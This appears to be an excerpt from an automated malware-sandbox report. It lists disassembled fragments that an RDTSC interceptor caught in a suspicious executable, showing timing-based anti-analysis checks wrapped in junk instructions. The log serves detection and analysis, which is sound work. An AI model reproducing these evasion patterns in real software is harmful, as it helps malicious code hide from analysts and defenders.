Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: 71D007A second address: 71D0080 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: 71D0080 second address: 71D00AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D01523Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F953D015247h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: 71D00AA second address: 71D00B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: 71D00B0 second address: 71D00C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F953D01523Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: 71D00C6 second address: 71D00CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: 71D00CC second address: 71D00F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr fs:[00000030h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F953D015244h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: 71D00F0 second address: 71D016C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F953D46EDA1h 0x00000009 add ch, FFFFFF86h 0x0000000c jmp 00007F953D46EDA1h 0x00000011 popfd 0x00000012 movzx esi, di 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 sub esp, 18h 0x0000001b pushad 0x0000001c jmp 00007F953D46EDA9h 0x00000021 pushfd 0x00000022 jmp 00007F953D46EDA0h 0x00000027 sbb esi, 412A6188h 0x0000002d jmp 00007F953D46ED9Bh 0x00000032 popfd 0x00000033 popad 0x00000034 xchg eax, ebx 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 mov ebx, 25B0ADF6h 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: 71D016C second address: 71D0171 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: 71D0171 second address: 71D01FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46ED9Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F953D46ED9Bh 0x0000000f xchg eax, ebx 0x00000010 jmp 00007F953D46EDA6h 0x00000015 mov ebx, dword ptr [eax+10h] 0x00000018 pushad 0x00000019 movzx ecx, di 0x0000001c push ebx 0x0000001d call 00007F953D46EDA6h 0x00000022 pop esi 0x00000023 pop ebx 0x00000024 popad 0x00000025 xchg eax, esi 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007F953D46EDA3h 0x0000002f xor ah, FFFFFFEEh 0x00000032 jmp 00007F953D46EDA9h 0x00000037 popfd 0x00000038 movzx ecx, bx 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: 71D01FC second address: 71D0220 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D01523Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F953D01523Bh 0x0000000f xchg eax, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov eax, 7B4DBB2Dh 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: 71D0220 second address: 71D0281 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F953D46EDA9h 0x00000008 pop ecx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov esi, dword ptr [775606ECh] 0x00000012 jmp 00007F953D46ED9Ah 0x00000017 test esi, esi 0x00000019 jmp 00007F953D46EDA0h 0x0000001e jne 00007F953D46FC0Ah 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F953D46EDA7h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: 71D0281 second address: 71D0286 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: 71D0286 second address: 71D02D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F953D46EDA5h 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushfd 0x00000012 jmp 00007F953D46EDA8h 0x00000017 sub esi, 3B962948h 0x0000001d jmp 00007F953D46ED9Bh 0x00000022 popfd 0x00000023 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: 71D02D2 second address: 71D032B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], edi 0x00000008 jmp 00007F953D015240h 0x0000000d call dword ptr [77530B60h] 0x00000013 mov eax, 756AE5E0h 0x00000018 ret 0x00000019 jmp 00007F953D015240h 0x0000001e push 00000044h 0x00000020 pushad 0x00000021 mov ax, 606Dh 0x00000025 call 00007F953D01523Ah 0x0000002a mov ax, A9A1h 0x0000002e pop ecx 0x0000002f popad 0x00000030 pop edi 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F953D01523Fh 0x0000003a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: 71D032B second address: 71D0348 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46EDA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: 71D0348 second address: 71D0364 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D015241h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b pushad 0x0000000c mov edx, esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: 71D0432 second address: 71D046D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46EDA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F953D46EDA8h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: 71D046D second address: 71D047C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D01523Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: 71D047C second address: 71D04A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F953D46ED9Fh 0x00000008 pop ecx 0x00000009 mov bh, 00h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test esi, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F953D46ED9Ah 0x00000019 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: 71D04A4 second address: 71D04B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D01523Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: 71D04B3 second address: 71D04CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 7E62CECAh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d je 00007F95AD77DF7Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push ecx 0x00000017 pop ebx 0x00000018 mov al, 36h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: 71D04CE second address: 71D050E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, ax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub eax, eax 0x0000000d jmp 00007F953D015245h 0x00000012 mov dword ptr [esi], edi 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F953D015248h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: 71D050E second address: 71D0514 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: 71D0514 second address: 71D053D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 jmp 00007F953D015248h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esi+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: 71D053D second address: 71D0541 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: 71D0541 second address: 71D0547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: 71D0547 second address: 71D0556 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F953D46ED9Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: 71D0556 second address: 71D0573 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+08h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F953D015240h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: 71D0573 second address: 71D05BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46ED9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+0Ch], eax 0x0000000c pushad 0x0000000d movzx eax, bx 0x00000010 pushfd 0x00000011 jmp 00007F953D46EDA1h 0x00000016 add cx, E5D6h 0x0000001b jmp 00007F953D46EDA1h 0x00000020 popfd 0x00000021 popad 0x00000022 mov eax, dword ptr [ebx+4Ch] 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 movzx ecx, dx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: 71D05BC second address: 71D05E6 instructions: 0x00000000 rdtsc 0x00000002 mov bx, 6E6Ah 0x00000006 pop edx 0x00000007 pop eax 0x00000008 movsx ebx, ax 0x0000000b popad 0x0000000c mov dword ptr [esi+10h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F953D015249h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: 71D05E6 second address: 71D05ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, bl 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: 71D05ED second address: 71D0604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [ebx+50h] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F953D01523Bh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: 71D0604 second address: 71D061C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F953D46EDA4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: 71D061C second address: 71D0639 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D01523Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+14h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 movsx edx, cx 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: 71D0639 second address: 71D0698 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46EDA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+54h] 0x0000000c jmp 00007F953D46EDA6h 0x00000011 mov dword ptr [esi+18h], eax 0x00000014 jmp 00007F953D46EDA0h 0x00000019 mov eax, dword ptr [ebx+58h] 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F953D46EDA7h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: 71D0698 second address: 71D06B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 22AAh 0x00000007 mov edx, 23EBBF76h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esi+1Ch], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov dl, cl 0x00000017 mov eax, ebx 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D06B2 second address: 71D06B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D06B8 second address: 71D06BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D06BC second address: 71D06FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46EDA6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+5Ch] 0x0000000e jmp 00007F953D46EDA0h 0x00000013 mov dword ptr [esi+20h], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F953D46ED9Ah 0x0000001f rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D06FC second address: 71D0702 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0702 second address: 71D07C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F953D46ED9Ch 0x00000009 add ax, 9158h 0x0000000e jmp 00007F953D46ED9Bh 0x00000013 popfd 0x00000014 mov dx, ax 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [ebx+60h] 0x0000001d jmp 00007F953D46EDA2h 0x00000022 mov dword ptr [esi+24h], eax 0x00000025 pushad 0x00000026 mov edi, 2D9D29D0h 0x0000002b popad 0x0000002c mov eax, dword ptr [ebx+64h] 0x0000002f pushad 0x00000030 mov ax, dx 0x00000033 pushfd 0x00000034 jmp 00007F953D46EDA1h 0x00000039 and ah, 00000056h 0x0000003c jmp 00007F953D46EDA1h 0x00000041 popfd 0x00000042 popad 0x00000043 mov dword ptr [esi+28h], eax 0x00000046 pushad 0x00000047 mov di, cx 0x0000004a mov ah, 94h 0x0000004c popad 0x0000004d mov eax, dword ptr [ebx+68h] 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 pushfd 0x00000054 jmp 00007F953D46ED9Ch 0x00000059 and ecx, 4C2337A8h 0x0000005f jmp 00007F953D46ED9Bh 0x00000064 popfd 0x00000065 call 00007F953D46EDA8h 0x0000006a pop esi 0x0000006b popad 0x0000006c rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D07C0 second address: 71D0850 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esi+2Ch], eax 0x0000000d jmp 00007F953D015246h 0x00000012 mov ax, word ptr [ebx+6Ch] 0x00000016 pushad 0x00000017 movzx ecx, di 0x0000001a push edx 0x0000001b pushfd 0x0000001c jmp 00007F953D015246h 0x00000021 add ah, FFFFFFC8h 0x00000024 jmp 00007F953D01523Bh 0x00000029 popfd 0x0000002a pop eax 0x0000002b popad 0x0000002c mov word ptr [esi+30h], ax 0x00000030 pushad 0x00000031 mov dx, 49F8h 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 pop esi 0x00000039 popad 0x0000003a mov ax, word ptr [ebx+00000088h] 0x00000041 pushad 0x00000042 movsx edi, ax 0x00000045 jmp 00007F953D015240h 0x0000004a popad 0x0000004b mov word ptr [esi+32h], ax 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007F953D01523Ah 0x00000058 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0850 second address: 71D0854 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0854 second address: 71D085A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D085A second address: 71D0893 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46ED9Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+0000008Ch] 0x0000000f pushad 0x00000010 mov esi, 65A2F8CDh 0x00000015 push eax 0x00000016 push edx 0x00000017 call 00007F953D46EDA8h 0x0000001c pop ecx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0893 second address: 71D08C3 instructions: 0x00000000 rdtsc 0x00000002 mov cl, dh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esi+34h], eax 0x0000000a jmp 00007F953D01523Ah 0x0000000f mov eax, dword ptr [ebx+18h] 0x00000012 jmp 00007F953D015240h 0x00000017 mov dword ptr [esi+38h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D08C3 second address: 71D08C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D08C9 second address: 71D094B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D015244h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+1Ch] 0x0000000c jmp 00007F953D015240h 0x00000011 mov dword ptr [esi+3Ch], eax 0x00000014 pushad 0x00000015 mov edx, eax 0x00000017 mov edx, eax 0x00000019 popad 0x0000001a mov eax, dword ptr [ebx+20h] 0x0000001d jmp 00007F953D015244h 0x00000022 mov dword ptr [esi+40h], eax 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F953D01523Eh 0x0000002c adc ecx, 27BCB298h 0x00000032 jmp 00007F953D01523Bh 0x00000037 popfd 0x00000038 mov ah, 50h 0x0000003a popad 0x0000003b lea eax, dword ptr [ebx+00000080h] 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 mov edi, eax 0x00000046 movzx ecx, bx 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D094B second address: 71D0960 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F953D46EDA1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0960 second address: 71D09D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000001h 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F953D015243h 0x00000011 or eax, 76F0E56Eh 0x00000017 jmp 00007F953D015249h 0x0000001c popfd 0x0000001d mov ch, 3Eh 0x0000001f popad 0x00000020 push esi 0x00000021 jmp 00007F953D015248h 0x00000026 mov dword ptr [esp], eax 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F953D015247h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D09D7 second address: 71D0A50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F953D46ED9Fh 0x00000009 and si, DD8Eh 0x0000000e jmp 00007F953D46EDA9h 0x00000013 popfd 0x00000014 mov edi, eax 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 lea eax, dword ptr [ebp-10h] 0x0000001c jmp 00007F953D46ED9Ah 0x00000021 nop 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F953D46ED9Dh 0x00000029 add al, 00000076h 0x0000002c jmp 00007F953D46EDA1h 0x00000031 popfd 0x00000032 popad 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F953D46ED9Ch 0x0000003b rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0A50 second address: 71D0A56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0A56 second address: 71D0A5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0AB4 second address: 71D0AB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0AB9 second address: 71D0B03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, di 0x00000006 pushfd 0x00000007 jmp 00007F953D46ED9Dh 0x0000000c add ch, FFFFFFF6h 0x0000000f jmp 00007F953D46EDA1h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov edi, eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F953D46EDA8h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0B03 second address: 71D0B07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0B07 second address: 71D0B0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0B0D second address: 71D0B71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F953D01523Ch 0x00000008 pop eax 0x00000009 call 00007F953D01523Bh 0x0000000e pop eax 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 test edi, edi 0x00000014 pushad 0x00000015 push ebx 0x00000016 mov edi, esi 0x00000018 pop ecx 0x00000019 mov cx, dx 0x0000001c popad 0x0000001d js 00007F95AD323DC2h 0x00000023 jmp 00007F953D01523Fh 0x00000028 mov eax, dword ptr [ebp-0Ch] 0x0000002b pushad 0x0000002c mov edx, ecx 0x0000002e mov ah, 4Ch 0x00000030 popad 0x00000031 mov dword ptr [esi+04h], eax 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F953D015245h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0B71 second address: 71D0B86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46EDA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0B86 second address: 71D0B8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0B8C second address: 71D0BBF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46EDA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebx+78h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F953D46EDA5h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0BBF second address: 71D0C89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F953D015247h 0x00000009 adc esi, 27E43B6Eh 0x0000000f jmp 00007F953D015249h 0x00000014 popfd 0x00000015 jmp 00007F953D015240h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push 00000001h 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F953D01523Eh 0x00000026 adc al, 00000018h 0x00000029 jmp 00007F953D01523Bh 0x0000002e popfd 0x0000002f call 00007F953D015248h 0x00000034 mov si, 0F51h 0x00000038 pop eax 0x00000039 popad 0x0000003a push ebp 0x0000003b jmp 00007F953D01523Ah 0x00000040 mov dword ptr [esp], eax 0x00000043 jmp 00007F953D015240h 0x00000048 lea eax, dword ptr [ebp-08h] 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e mov cl, bh 0x00000050 jmp 00007F953D015246h 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D0C89 second address: 71D0CAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F953D46EDA4h 0x0000000f push eax 0x00000010 pushad 0x00000011 mov eax, edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
